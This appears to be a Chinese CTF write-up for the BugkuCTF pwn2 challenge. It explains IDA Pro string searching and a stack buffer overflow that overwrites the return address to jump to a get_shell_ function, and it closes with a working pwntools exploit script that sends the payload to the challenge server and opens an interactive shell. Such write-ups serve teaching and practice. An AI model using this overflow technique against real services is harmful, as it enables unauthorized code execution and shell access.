本文介绍了如何利用IDAPro定位内存中的字符串,通过字符串溢出覆盖返回地址实现代码执行,详细讲述了payload构造和远程攻击过程。关键步骤包括利用Stringwindow搜索字符串,覆盖内存和调用get_shell_函数。
写在前面
一些 IDA Pro 的使用:
Shift + F12:打开 String window,在其中搜索某个字符串即可定位到内存中的位置。右键,jump to xref to operand… 即可定位到引用了该字符串的函数。
BugkuCTF-pwn2
读入了一个字符串长度最长 0x100,但是从第三行得知 s 到 rbp 只有 0x30,因此可以覆盖 main 返回地址。
在左边找到一个函数名叫 get_shell_,显然可以跳转到这里。
这里,只需要跳转到 0x400751。
那么输入的字符串应该是什么?注意到从 rbp-30 处填写 30 个字节覆盖到 rbp 之前,再填写 8 个字节覆盖 rbp,再填写的东西就覆盖返回地址了。如图:
因此,先瞎填 38 个字节,然后填 p64(0x400751) 即可。
注意,python2 下,该函数转化为 8 个字符,p64(0x1144) = ‘D\x11\00\00\00\00\00\00’。这样小端对齐,在内存中看来就是一个正常的地址。
from pwn import *
sh = remote("114.67.246.176", 14235)
print(sh.recv())
payload = "k" * 0x38 + p64(0x400751)
sh.sendline(payload)
sh.interactive()
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
